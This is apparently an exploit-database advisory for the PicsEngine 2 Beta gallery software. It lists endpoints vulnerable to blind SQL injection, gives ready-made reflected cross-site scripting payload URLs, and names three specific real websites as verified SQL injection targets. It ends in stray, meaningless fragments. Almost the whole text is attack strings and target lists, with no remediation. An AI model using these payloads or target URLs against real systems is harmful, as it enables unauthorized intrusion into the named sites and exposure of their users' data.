PicsEngine Application error message Vulnerability
==================================================
Author indoushka
==================================================
vendor : Powered by PicsEngine 2 Beta
==================================================
Blind SQL Injection :
/chabluesphotos/xml/comments.php?id=if
/chabluesphotos/xml/get.php?id=if
/chabluesphotos/xml/photos.php?id=if
Cross site scripting (verified)
/chabluesphotos/xml/comments.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
/chabluesphotos/xml/get.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
/chabluesphotos/xml/photos.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
SQL injection (verified)
http://www.tsampa.be/pics/xml/photos.php?id=1
http://www.sylval.com/galerie/xml/photos.php?id=1
http://lacroizette.sur-le-web.fr/locaux/xml/photos.php?id=1
ube pcr
llc
